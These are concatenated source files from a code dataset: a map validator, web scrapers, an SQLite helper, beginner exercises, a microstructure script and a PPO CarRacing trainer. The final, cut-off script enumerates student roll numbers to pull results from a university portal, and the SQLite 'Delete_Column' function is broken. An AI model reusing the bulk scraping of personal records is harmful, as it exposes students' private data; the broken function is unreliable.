speeduplayer\")\n return\n\ndef validate_map(path, gtype, only_critical=False):\n global mappath, mapname, gametype, show_error, success\n\n mappath = path\n mapname = os.path.basename(path)[:-4]\n gametype = gtype\n show_error = not 
only_critical\n success = True\n\n t = load_map()\n if t:\n validate_settings(t)\n validate_mapres(t)\n validate_layers(t)\n validate_gametiles(t)\n validate_teletiles(t)\n validate_speeduptiles(t)\n\n if show_error:\n ddnet_build_dir = os.path.join(tw.srcdir, 'ddnet', 'build')\n p = subprocess.run([os.path.join(ddnet_build_dir, 'map_convert_07'), mappath, '/dev/null'],\n cwd=ddnet_build_dir, capture_output=True, text=True)\n for message in re.findall(f'\\[map_convert_07\\]: {re.escape(mappath)}: (.*)', p.stdout):\n err(message)\n\n return success\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('mapfile', help=\"path to the map file\")\n parser.add_argument('category', choices=[\"Short\", \"Middle\", \"Long Easy\", \"Long Advanced\", \"Long Hard\", \"Fastcap\"])\n args = parser.parse_args()\n\n if validate_map(args.mapfile, 'fastcap' if args.category == \"Fastcap\" else 'race'):\n print(\"Found no errors\")\n","sub_path":"race/validate_map.py","file_name":"validate_map.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129388296","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nCSV = 'product.csv'\nHOST = 'https://zoomagazin.dp.ua/'\nURL = 'https://zoomagazin.dp.ua/catalog/sobaki/pitanie-sobak/korma-dlya-sobak/'\n\nHEADERS = {\n 'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'\n}\n\ndef get_html(url, params=''):\n req = requests.get(url, headers=HEADERS, params=params)\n return req\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='product-layout')\n\n products = []\n\n for item in items:\n products.append(\n {\n 'handleId': '',\n 'fieldType': 'Product',\n 'name': item.find('div', class_='caption').find('a').get_text(strip=True),\n 'description': '',\n 'img': item.find('div', class_='image').find('a').get('href'),\n 'price': item.find('div', class_='kit').find('p').get_text(strip=True)\n }\n )\n return products\n\ndef save_doc(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['handleId', 'fieldType', 'name', 'description', 'productImageUrl', 'price'])\n for item in items:\n writer.writerow([item['handleId'], item['fieldType'], item['name'], item['description'], item['img'], item['price']])\n\ndef parser():\n PAG = input('How PAGES: ')\n PAG = int(PAG.strip())\n html = get_html(URL)\n if html.status_code == 200:\n products = []\n for page in range(1, PAG):\n print(f'Procesing: {page}')\n html = get_html(URL, params={'page': page})\n products.extend(get_content(html.text))\n save_doc(products, CSV)\n pass\n else:\n print('Err')\n\nparser()\n\n# html = get_html(URL)\n# print(get_content(html.text))\n","sub_path":"parser1.py","file_name":"parser1.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394157717","text":"import sqlite3\n\ndef Delete_Column(DB_name,table_name, *columns):\n\ttry:\n\t\tdb = sqlite3.connect(DB_name)\n\t\tsql = db.cursor()\n\t\t#columns = iterCols if iterCols!=None and len(iterCols)!=0 else columns\n\t\tquery = sql.execute(\"PRAGMA table_info(%s)\" % 
table_name)\n\t\tquery = list(query)\n\t\t\n\t\tif len(query) != 0 and colunm_name != new_name:\n\t\t\t\tcols = {}\n\t\t\t\tfor col in query:\n\t\t\t\t\tcols.setdefault(col[1],col[2])\n\n\t\t\t\tquery = ','.join(cols.keys())\n\t\t\t\tdata = list(sql.execute(\"SELECT %s FROM \" % query +table_name))\n\t\t\t\t\n\t\t\t\tsql.execute(\"ALTER TABLE \"+table_name+\" RENAME TO T_M_P\")\n\n\t\t\t\tnewCols = ''\n\t\t\t\tfor col in cols.items():\n\t\t\t\t\tnewCols += ' '.join(col)+','\n\t\t\t\tnewCols = newCols.replace(colunm_name,new_name)\n\t\t\t\tquery = \"CREATE TABLE {0} ({1})\".format(table_name, newCols.strip(','))\n\t\t\t\tsql.execute(query)\n\n\t\t\t\tcols = [\"?\" for _ in range(len(cols))]\n\t\t\t\tquery = \"INSERT INTO \"+table_name+\" VALUES (%s)\" % ','.join(cols)\n\t\t\t\tsql.executemany(query, data)\n\t\t\t\tsql.execute(\"DROP TABLE T_M_P\")\n\t\t\t\tdb.commit()\n\t\t\t\tprint(\"Column successfully renamed\")\n\t\telif colunm_name == new_name:\n\t\t\tprint(\"Wrong arguments!\")\n\t\telse: print(\"NO SUCH TABLE\")\n\n\texcept sqlite3.OperationalError as e: \n\t\tsql.execute(\"ALTER TABLE T_M_P RENAME TO \"+table_name)\n\t\tprint(\"Wrong arguments:\",e)\n\texcept Exception as e: \n\t\tsql.execute(\"ALTER TABLE T_M_P RENAME TO \"+table_name)\n\t\tprint(\"Something went wrong :(\",e)","sub_path":"Python/PlayListStore_4.0/sql_dlc.py","file_name":"sql_dlc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"639436628","text":"import logging\nfrom sklearn.naive_bayes import GaussianNB\n\n# init logging\nlog_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\nlogging.basicConfig(level=logging.INFO, format=log_fmt)\nlogger = logging.getLogger(__name__)\n\n\ndef train_test_nb(X_train, y_train, X_test, y_test):\n    # fits Gaussian Naive Bayes (not an SVM, as the old name suggested)\n    # and logs the misclassification rate on the test set\n    gnb = GaussianNB()\n    y_pred = gnb.fit(X_train, y_train).predict(X_test)\n    logger.info('size {}'.format(y_test.shape[0]))\n    logger.info('result {}'.format(((y_test != 
y_pred).sum())/y_test.shape[0]))\n","sub_path":"src/learners/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564378830","text":"from random import randint\nimport math\n\n\"\"\"\n分段函数求值\n\n 3x - 5 (x > 1)\nf(x) = x + 2 (-1 <= x <= 1)\n 5x + 3 (x < -1)\n\nVersion: 0.1\nAuthor: Jing\n\"\"\"\n\n\"\"\" Example\nx = float(input('x = '))\nif x>1:\n y=3*x-5\nelif x>=-1 and x<=1:\n y=x+2\nelse:\n y=5*x+3\n\nprint('f(%.2f) = %.2f' % (x, y))\n\"\"\"\n\n\ndef incm_transfer():\n value = float(input('请输入长度:'))\n unit = input('请输入单位:')\n\n if unit=='in' or unit=='英寸':\n print('%f英寸 = %f厘米' % (value, value*2.54))\n elif unit=='cm' or unit=='厘米':\n print('%.2f厘米 = %.2f英寸' % (value, value/2.54))\n else:\n print('请输入有效的单位!')\n\n\ndef random_task_to_do():\n face = randint(1,6)#get a random int among[1-6] a <= N <= b\n if face == 1:\n result = '唱首歌'\n elif face ==2:\n result = '跳个舞'\n elif face ==3:\n result = '学狗叫'\n elif face ==4:\n result = '做俯卧撑'\n elif face ==5:\n result = '念绕口令'\n else:\n result = '讲冷笑话'\n print(result)\n\ndef score_to_level():\n score = float(input('请输入成绩:'))\n if score >=90:\n grade = 'A'\n elif score>=80:\n grade = 'B'\n elif score>=70:\n grade = 'C'\n elif score>=60:\n grade = 'D'\n else:\n grade = 'E'\n print('对应的等级是:', grade)\n\ndef is_triangle():\n a = float(input('a = '))\n b = float(input('b = '))\n c = float(input('c = '))\n\n if a+b>c and a+c>b and b+c>a:\n print('周长:%.2f' % (a+b+c) )\n p=(a+b+c)/2\n area=math.sqrt(p*(p-a)*(p-b)*(p-c))\n print('面积:%.2f' % (area))\n else:\n print('不能构成三角形')\n\ndef individual_income_tax():\n salary = float(input('本月收入:'))\n insurance = float(input('五险一金:'))\n diff = salary-insurance-3500\n if diff <= 0:\n rate = 0\n deduction=0\n elif diff <1500:\n rate = 0.03\n deduction = 0\n elif diff <4500:\n rate = 0.1\n deduction = 105\n elif diff <9000:\n rate = 0.2\n deduction = 555\n elif diff <35000:\n rate = 0.25\n deduction = 1005\n elif diff <55000:\n rate = 0.3\n deduction = 2755\n elif diff <80000:\n rate = 0.35\n deduction = 5505\n else:\n rate = 0.45\n deduction = 13505\n tax = abs(diff*rate - deduction)\n print('个人所得税:¥%.2f元' % tax )\n print('实际到手收入:¥%.2f元' % (diff+3500-tax))\n\ndef verify():\n username = input('请输入用户名:')\n password = input('请输入密码:')\n if username=='admin' and password=='123456':\n print('身份验证成功!')\n else:\n print('身份验证失败!')\n\n\nif __name__==\"__main__\":\n # incm_transfer()\n # random_task_to_do()\n # score_to_level()\n # is_triangle()\n # individual_income_tax()\n # verify()\n pass","sub_path":"Day01-15/Day003/Day3_if.py","file_name":"Day3_if.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"469805607","text":"import microstructure as mStr\nfrom numpy import linspace, pi, sin, cos, concatenate, zeros_like, zeros\nfrom copy import deepcopy\n\n# _______________________________________________________________________\n\n# slab\nnumSlabs = 4 # pocet stlpikov podopierajucich gulovite uchytky\nnumRays = 2 # pocet lucov\nslabSpeed = 50 # rychlost polymerizovania stlpika\nxyres = 0.25 # vzdialenost medzi ciarami pri budovani stlpika\nslabSz = [1, 1, 8] # rozmer stlpika [x,y,z]\n\n# circle\ncircSpeed = 80 # rychlost polymerizacie kruhu\ncircR = 10 # polomer kruhu\ncircPoints = 50 # pocet bodov kruznice\nnumCircles = 2 # pocet kruznic tvoriacich polymerizovany kruh v oboch smeroch\ncircDist = 0.1 # 
vzdialenost kruznic pri polymerizovani kruhu\n\n# sphere\nsphereR = 1.0 # polomer gulicky na stlpikoch\nsphereRayR = 0.5 # polomer gulicky \"zdureniny\" z ktrej ide luc z kruhu\nsphereSpeed = 20 # rychlost polymerizovania gulicky\narmSphereR = 1 # polomer efektorovej gulicky\narmSphereHeight = 2 # vyska gulicky nad podlahou\n\n# arm (usecky alebo aj krivky ako napr. sinus)\narmSpeed = 50 # rychlost polymerizacie luca\narmPoints = 50 # pocet bodov - iba v pripade kriviek\narmAmplit = 1.0 # amplituda Y (v pripade krivky), 0 je rovna ciara\n\n# wall \nwallCircSpeed = 80 # rychlost polymerizacie kruhu\nwallCircR = 30 # polomer kruhu\nwallCircPoints = 50 # pocet bodov kruznice\nwallNumCircles = [4, 70] # pocet kruznic tvoriacich polymerizovany kruh v smeroch [X, Z]\nwallCircDist = 0.2 # vzdialenost kruznic pri polymerizovani kruhu\n# _______________________________________________________________________\n\ndef DoLine(P1, P2):\n lineArr = zeros((2, 5))\n lineArr[:, 0] = [P1[0], P2[0]]\n lineArr[:, 1] = [P1[1], P2[1]]\n lineArr[:, 2] = [P1[2], P2[2]]\n lineArr[:, 3] = 1\n lineArr[-1, 3:5] = [0, armSpeed]\n return lineArr\n\ndef circle(radius, elev):\n phivec = linspace(0, 2*pi, circPoints)\n arr = zeros((len(phivec), 5))\n arr[:, 0] = cos(phivec) * radius\n arr[:, 1] = sin(phivec) * radius\n arr[:, 2] = elev\n arr[:, 3] = 1\n arr[-1, 3:5] = [0, circSpeed]\n return arr\n\ndef SinusLine(P1, P2):\n x1 = linspace(-pi/2, pi/2, armPoints/2)\n x2 = linspace(pi/2, 3*pi/2, armPoints)\n x3 = linspace(3*pi/2, 5*pi/2, armPoints/2)\n y1 = sin(x1)*0.5+0.5\n y2 = sin(x2)\n y3 = sin(x3)*0.5-0.5\n x = concatenate((x1[0:-1], x2, x3[1:]))\n y = concatenate((y1[0:-1], y2, y3[1:]))\n\n x = (x-min(x))/x.ptp()\n x = x * (P2[2] - P1[2]) + P1[2]\n y = y * armAmplit\n\n sinLine = zeros((len(x), 5))\n sinLine[:, 0] = P1[0]-y\n sinLine[:, 1] = P1[1]\n sinLine[:, 2] = x \n sinLine[:, 3] = 1\n sinLine[-1, 3:5] = [0, armSpeed]\n\n return sinLine\n\n\n# rozdeli 0-360 stupnov na 3 casti (4 okrajove body)\nverts = linspace(pi/4, 9*pi/4, numSlabs+1)\nslabPosX = cos(verts) * circR\nslabPosY = sin(verts) * circR\n\n# postavi stredovy stlpik \nslab0 = mStr.slabStr([slabSz[0], slabSz[1], slabSz[2] + 2*sphereR],[0, 1, 2], [xyres, 0.2], slabSpeed)\nslab0.shift([-slabSz[0]/2, -slabSz[1]/2, 0])\nviscoStruct = slab0\n\nfor i in range(numSlabs):\n #stlpik pod kruhom ukonceny gulickou\n slab1 = mStr.slabStr([slabSz[0], slabSz[1], slabSz[2] + sphereR/3],[0, 1, 2], [xyres, 0.2], slabSpeed)\n slab1.shift([slabPosX[i]-slabSz[0]/2, slabPosY[i]-slabSz[1]/2, 0])\n viscoStruct.addStr(slab1)\n sph1 = mStr.sphereStr(slabPosX[i], slabPosY[i], slabSz[2]+sphereR, sphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sph1)\n\n# prida priecky (vystuze kruhu)\ncrossLine1 = DoLine([slabPosX[0], slabPosY[0], slabSz[2]], [slabPosX[2], slabPosY[2], slabSz[2]])\nviscoStruct.addStr(mStr.MicroStr(crossLine1))\ncrossLine2 = DoLine([slabPosX[1], slabPosY[1], slabSz[2]], [slabPosX[3], slabPosY[3], slabSz[2]])\nviscoStruct.addStr(mStr.MicroStr(crossLine2))\n\n# telo kruhu\nfor i in range(-numCircles, numCircles):\n circElevation = slabSz[2] + sphereR + i*circDist\n for j in range(-numCircles, numCircles):\n circ = mStr.MicroStr(circle(circR + j*circDist, circElevation))\n viscoStruct.addStr(circ)\n\n# rozdeli 45-405 stupnov na 3 casti (4 okrajove body)\nvertsRay = linspace(0, 2*pi, numRays+1)\nslabRayPosX = cos(vertsRay) * circR\nslabRayPosY = sin(vertsRay) * circR\n\n # stlpiky pod zaciatkom a koncom luca ukoncene gulickou\nfor i in 
range(numRays):\n sphRay1 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], slabSz[2]+sphereR, sphereRayR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sphRay1)\n \n# luce az nakoniec lebo su tenke, luc ma sinusovy priebeh\nfor i in range(numRays):\n P1 = [slabRayPosX[i], slabRayPosY[i], slabSz[2] + sphereR]\n P2 = [slabRayPosX[i], slabRayPosY[i], 0]\n lineArr = SinusLine(P1, P2)\n #lineArr = DoLine(P1, P2)\n viscoStruct.addStr(mStr.MicroStr(lineArr))\n\n# gulicka do stredu luca\nfor i in range(numRays):\n #sphRay2 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], armSphereHeight+sphereR, armSphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n sphRay2 = mStr.sphereStr(slabRayPosX[i], slabRayPosY[i], (slabSz[2] + sphereR)/2, armSphereR, sphereSpeed, xyres, 1.0, 1, shellspacing=0.5)\n viscoStruct.addStr(sphRay2)\n\n\"\"\" \n# telo kruhovej ohrady\nwall = mStr.MicroStr(zeros((0,5)))\nfor i in range(wallNumCircles[1]):\n circElevation = i*wallCircDist\n for j in range(wallNumCircles[0]):\n circ = mStr.MicroStr(circle(wallCircR + j*wallCircDist, circElevation))\n wall.addStr(circ)\n\nviscoStruct.addStr(wall)\n\"\"\"\nviscoStruct.plot(1, markerscalef=0.1)\n","sub_path":"viscoCircleDown_1.py","file_name":"viscoCircleDown_1.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"153281831","text":"import logging\nimport sys\nimport datetime\nimport os \nfrom os.path import join, exists\ndef set_logger(logger):\n formatter = logging.Formatter(\n \"%(asctime)s - %(filename)s:%(lineno)s - %(levelname)s - %(message)s\"\n )\n\n \n logger.setLevel(logging.INFO)\n logger.handlers = []\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n current_time = datetime.datetime.now().strftime(\"%b%d_%H-%M-%S\")\n logdir = os.path.join(\"runs\", current_time)\n\n os.makedirs(logdir, exist_ok=True)\n filename = os.path.join(logdir, \"run.log\")\n handler = logging.FileHandler(filename)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger, logdir\n\n\nlogger = logging.getLogger()\nlogdir = set_logger(logger)\n\nlogger.info(\"Running RCRC VAE PPO\")\n\n\nimport argparse\n\nimport numpy as np\n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Beta\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n#from environment import make_single_env\nfrom torch.utils.tensorboard import SummaryWriter\nfrom cv2 import resize as rsz\nfrom utils.misc import ASIZE, LSIZE, RSIZE, RED_SIZE, SIZE, transform\nfrom models import VAE\n\n\nparser = argparse.ArgumentParser(description='Train a PPO agent for the CarRacing-v0')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G', help='discount factor (default: 0.99)')\nparser.add_argument('--action-repeat', type=int, default=8, metavar='N', help='repeat action in N frames (default: 8)')\nparser.add_argument('--img-stack', type=int, default=3, metavar='N', help='stack N image in a state (default: 4)')\nparser.add_argument('--seed', type=int, default=np.random.randint(np.int32(2**31-1)), metavar='N', help='random seed (default: 0)')\nparser.add_argument('--render', action='store_true', help='render the environment')\nparser.add_argument('--tb', action='store_true', help='use 
tb')\nparser.add_argument(\n '--log-interval', type=int, default=10, metavar='N', help='interval between training status logs (default: 10)')\nargs = parser.parse_args()\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\ntorch.manual_seed(args.seed)\nif use_cuda:\n torch.cuda.manual_seed(args.seed)\n\ntransition = np.dtype([('s', np.float64, (1537,)), ('a', np.float64, (3,)), ('a_logp', np.float64),\n ('r', np.float64), ('s_', np.float64, (1537,))])\n\n\n\n\n \n\nclass Env(gym.Wrapper):\n \"\"\"\n Environment wrapper for CarRacing \n \"\"\"\n\n def __init__(self, env, resize=False, img_stack=3, action_repeat=8):\n super(Env, self).__init__(env)\n self.env = env\n #self.env.seed(args.seed)\n self.reward_threshold = self.env.spec.reward_threshold\n self.resize = resize\n self.img_stack = img_stack\n self.action_repeat = action_repeat\n\n def reset(self):\n self.counter = 0\n self.av_r = self.reward_memory()\n\n self.die = False\n img_rgb = self.env.reset()\n img_gray = self.rgb2gray(img_rgb)\n if self.resize:\n img_gray = rsz(img_gray, (64,64))\n self.stack = [img_gray] * self.img_stack # four frames for decision\n out_img_stack = np.array(self.stack).astype(np.float64) \n #out_img_stack = np.interp(out_img_stack, (out_img_stack.min(), out_img_stack.max()), (0, 255))\n out_img_stack = (out_img_stack / out_img_stack.max()) * 255 \n out_img_stack = out_img_stack.astype(np.uint8).transpose(1,2,0)\n return out_img_stack\n\n def step(self, action):\n \n total_reward = 0\n for i in range(self.action_repeat):\n img_rgb, reward, die, _ = self.env.step(action)\n # don't penalize \"die state\"\n if die:\n reward += 100\n # green penalty\n if np.mean(img_rgb[:, :, 1]) > 185.0:\n reward -= 0.05\n total_reward += reward\n # if no reward recently, end the episode\n done = True if self.av_r(reward) <= -0.1 else False\n if done or die:\n break\n img_gray = self.rgb2gray(img_rgb)\n if self.resize:\n img_gray = rsz(img_gray, (64,64))\n self.stack.pop(0)\n self.stack.append(img_gray)\n assert len(self.stack) == self.img_stack\n if done or die:\n done = True\n out_img_stack = np.array(self.stack).astype(np.float64) \n #out_img_stack = np.interp(out_img_stack, (out_img_stack.min(), out_img_stack.max()), (0, 255))\n out_img_stack = (out_img_stack / out_img_stack.max()) * 255 \n out_img_stack = out_img_stack.astype(np.uint8).transpose(1,2,0)\n \n return out_img_stack, total_reward, done, die\n\n def render(self, *arg):\n self.env.render(*arg)\n\n @staticmethod\n def rgb2gray(rgb, norm=True):\n # rgb image -> gray [0, 1]\n gray = np.dot(rgb[..., :], [0.299, 0.587, 0.114])\n if norm:\n # normalize\n gray = gray / 128. 
- 1.\n return gray\n\n @staticmethod\n def reward_memory():\n # record reward for last 100 steps\n count = 0\n length = 100\n history = np.zeros(length)\n\n def memory(reward):\n nonlocal count\n history[count] = reward\n count = (count + 1) % length\n return np.mean(history)\n\n return memory\n\n \n\n\ndef init_W(n, m):\n weight = torch.normal(mean=torch.zeros((n, m)), std=torch.ones((n, m)))\n\n N = n * m\n p = int(0.2 * N)\n\n u, s, v = torch.svd(weight, compute_uv=True)\n s_ = 0.95 * s / s.max()\n\n weight = u * s_ * v.t()\n indices = np.random.choice(N, p)\n for i in indices:\n a = i // n\n b = i - a * n\n weight[a, b] = 0\n return weight\n\n\nclass FixedRandomModel(nn.Module):\n def __init__(self, alpha):\n super().__init__()\n #self.conv = Conv()\n vae_file = join(\"./vae\", 'best.tar') \n\n assert exists(vae_file) , \"vae is untrained.\"\n\n vae_state = torch.load(vae_file, map_location={'cuda:0': str(device)})\n\n logger.info(\"Loading VAE at epoch {} with test loss {}\".format(vae_state['epoch'], vae_state['precision']))\n\n self.vae = VAE(3, LSIZE).to(device).double()\n self.vae.load_state_dict(vae_state['state_dict'])\n \n self.W_in = nn.Linear(2*2*256, 512, bias=False)\n self.W = nn.Linear(512, 512, bias=False)\n self.W.weight.data = init_W(512, 512)\n self.x_esn = None\n self.alpha = alpha\n\n def forward(self, obs):\n B = obs.shape[0]\n _, _, _, x_conv = self.vae(obs)\n x_conv_flat = x_conv.view(B, -1)\n\n if self.x_esn is None or self.x_esn.shape[0] != B:\n x_esn = torch.tanh(self.W_in(x_conv_flat))\n else:\n x_hat = torch.tanh(self.W_in(x_conv_flat) + self.W(self.x_esn))\n x_esn = (1 - self.alpha) * self.x_esn + self.alpha * x_hat\n self.x_esn = x_esn\n return (x_conv_flat, x_esn)\n\n\nclass WM(nn.Module):\n def __init__(self, model):\n super(WM, self).__init__()\n self.model = model\n \n \n def forward(self, obs):\n x_conv, x_esn = self.model(obs)\n B = obs.shape[0]\n S = torch.cat((x_conv, x_esn, torch.ones((B, 1)).double().to(device) ), dim=1)\n\n return S\n \n \nclass ACC(nn.Module):\n \"\"\"\n Actor-Critic Network for PPO\n \"\"\"\n\n def __init__(self, wm_model):\n super(ACC, self).__init__()\n self.wm_model = wm_model\n for p in self.wm_model.parameters():\n p.requires_grad = False\n self.v = nn.Sequential(nn.Linear(1537, 256), nn.ReLU(), nn.Linear(256, 1))\n self.fc = nn.Sequential(nn.Linear(1537, 256), nn.ReLU())\n self.alpha_head = nn.Sequential(nn.Linear(256, 3), nn.Softplus())\n self.beta_head = nn.Sequential(nn.Linear(256, 3), nn.Softplus())\n\n\n def forward(self, x, actual_obs=True):\n if actual_obs:\n x = self.wm_model(x)\n \n rcrc_s = x.view(-1, 1537)\n v = self.v(rcrc_s)\n p = self.fc(rcrc_s)\n alpha = self.alpha_head(p) + 1\n beta = self.beta_head(p) + 1\n\n return (alpha, beta), v, rcrc_s\n\n\nclass Agent():\n \"\"\"\n Agent for training\n \"\"\"\n max_grad_norm = 0.5\n clip_param = 0.1 # epsilon in clipped loss\n ppo_epoch = 10\n buffer_capacity, batch_size = 1750, 128\n\n def __init__(self):\n self.training_step = 0\n self.fixed_model = FixedRandomModel(0.5).double().to(device)\n self.wm_model = WM(self.fixed_model).double().to(device)\n self.net = ACC(self.wm_model).double().to(device)\n if os.path.exists(\"param/ppo_net_params.pkl\"):\n self.load_param()\n logger.info(\"Model Loaded Successfully\")\n self.buffer = np.empty(self.buffer_capacity, dtype=transition)\n self.counter = 0\n\n self.optimizer = optim.Adam(self.net.parameters(), lr=1e-3)\n\n def select_action(self, state):\n #state = torch.from_numpy(state).double().to(device).unsqueeze(0)\n 
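On `init_W` above: rescaling the singular values caps the spectral norm at 0.95 (a standard echo-state-network stability heuristic) and roughly 20% of entries are zeroed for sparsity, but `u * s_ * v.t()` multiplies elementwise rather than reconstructing the matrix, and `a = i // n` indexes rows correctly only because the reservoir here is square (512×512). A sketch with the SVD reassembled as a proper product:

```python
# Sketch of the reservoir init with a real SVD reconstruction; the
# elementwise u * s_ * v.t() in init_W above does not rebuild the matrix.
import torch

def init_reservoir(n, m, rho=0.95, sparsity=0.2):
    w = torch.randn(n, m)
    u, s, v = torch.svd(w)
    w = u @ torch.diag(rho * s / s.max()) @ v.t()  # cap the spectral norm
    mask = (torch.rand(n, m) > sparsity).to(w.dtype)  # drop ~20% of weights
    return w * mask
```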
with torch.no_grad():\n (alpha, beta), _, rcrc_s = self.net(state)\n dist = Beta(alpha, beta)\n action = dist.sample()\n a_logp = dist.log_prob(action).sum(dim=1)\n\n action = action.squeeze().cpu().numpy()\n a_logp = a_logp.item()\n return action, a_logp, rcrc_s\n\n def save_param(self):\n torch.save(self.net.state_dict(), 'param/ppo_net_params.pkl')\n\n def store(self, transition):\n self.buffer[self.counter] = transition\n self.counter += 1\n if self.counter == self.buffer_capacity:\n self.counter = 0\n return True\n else:\n return False\n def load_param(self):\n self.net.load_state_dict(torch.load('param/ppo_net_params.pkl'))\n\n def update(self):\n self.training_step += 1\n\n s = torch.tensor(self.buffer['s'], dtype=torch.double).to(device)\n a = torch.tensor(self.buffer['a'], dtype=torch.double).to(device)\n r = torch.tensor(self.buffer['r'], dtype=torch.double).to(device).view(-1, 1)\n s_ = torch.tensor(self.buffer['s_'], dtype=torch.double).to(device)\n old_a_logp = torch.tensor(self.buffer['a_logp'], dtype=torch.double).to(device).view(-1, 1)\n\n with torch.no_grad():\n target_v = r + args.gamma * self.net(s_, actual_obs=False)[1]\n adv = target_v - self.net(s, actual_obs=False)[1]\n # adv = (adv - adv.mean()) / (adv.std() + 1e-8)\n\n for _ in range(self.ppo_epoch):\n for index in BatchSampler(SubsetRandomSampler(range(self.buffer_capacity)), self.batch_size, False):\n\n alpha, beta = self.net(s[index], actual_obs=False)[0]\n dist = Beta(alpha, beta)\n a_logp = dist.log_prob(a[index]).sum(dim=1, keepdim=True)\n ratio = torch.exp(a_logp - old_a_logp[index])\n\n surr1 = ratio * adv[index]\n surr2 = torch.clamp(ratio, 1.0 - self.clip_param, 1.0 + self.clip_param) * adv[index]\n action_loss = -torch.min(surr1, surr2).mean()\n value_loss = F.smooth_l1_loss(self.net(s[index], actual_obs=False)[1], target_v[index])\n loss = action_loss + 2. 
* value_loss\n\n self.optimizer.zero_grad()\n loss.backward()\n # nn.utils.clip_grad_norm_(self.net.parameters(), self.max_grad_norm)\n self.optimizer.step()\n\n\nif __name__ == \"__main__\":\n agent = Agent()\n env = gym.make(\"CarRacing-v0\")\n env = Env(env)\n parameters = sum(p.numel() for p in agent.net.parameters())\n train_parameters = sum(p.numel() for p in agent.net.parameters() if p.requires_grad)\n logger.info(\"Total Parameters : %s \" % parameters)\n logger.info(\"Trainable Params : %s\" % train_parameters)\n logger.info(agent.net)\n \n if args.tb:\n writer = SummaryWriter(log_dir=\"./tb/\")\n\n training_records = []\n running_score = 0\n state = env.reset()\n max_score = -1e4\n for i_ep in range(100000):\n score = 0\n state = env.reset()\n state = transform(state).unsqueeze(0).to(device).double()\n agent.net.wm_model.model.x_esn = None\n \n action, a_logp, rcrc_s = agent.select_action(state)\n for t in range(1000):\n state, reward, done, die = env.step(action * np.array([2., 1., 1.]) + np.array([-1., 0., 0.]))\n state = transform(state).unsqueeze(0).to(device).double()\n next_action, next_a_logp, rcrc_s_ = agent.select_action(state)\n if args.render:\n env.render()\n if agent.store((rcrc_s.cpu().numpy(), action, a_logp, reward, rcrc_s_.cpu().numpy())):\n logger.info('updating')\n agent.update()\n score += reward\n rcrc_s = rcrc_s_\n action = next_action\n a_logp = next_a_logp\n if done:\n break\n running_score = running_score * 0.99 + score * 0.01\n \n if i_ep % args.log_interval == 0:\n if args.tb:\n writer.add_scalar(\n \"running_score\", running_score, global_step=i_ep\n )\n writer.add_scalar(\n \"last_score\", score, global_step=i_ep\n )\n logger.info('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}'.format(i_ep, score, running_score))\n if running_score > max_score:\n max_score = running_score\n agent.save_param()\n logger.info(\"Saving a new model, max score is {}\".format(max_score))\n \n if running_score > env.reward_threshold:\n logger.info(\"Solved! 
Running reward is now {} and the last episode runs to {}!\".format(running_score, score))\n break\n","sub_path":"vrc/vrc_train.py","file_name":"vrc_train.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525850481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author: r4j\n# @Date: 2020-04-14 17:47:24\n# @Last Modified by: r4j\n# @Last Modified time: 2020-04-14 17:50:52\n\nimport re\nimport sys\nimport argparse\nimport requests\nimport concurrent.futures\n\n\nsubjects = [\n 'CLK3V',\n 'CLZ3P',\n 'SAE31',\n 'SAE3A',\n 'SBAOC',\n 'TSSEG',\n 'CLE3H',\n 'CLA3M']\n\nresult_url = 'https://egovernance.unom.ac.in/resultnocap/'\narrear_url = result_url\nreval_url = 'https://egovernance.unom.ac.in/RVNOV2019/'\n\nroll_number = [roll for roll in range(221810449, 221810499)]\n\n\ndef status(url):\n if requests.get(url).status_code == 200:\n return True\n\n\ndef calc_arrears(roll):\n roll_no = roll\n\n data = {\n '__LASTFOCUS': '',\n '__VIEWSTATE': 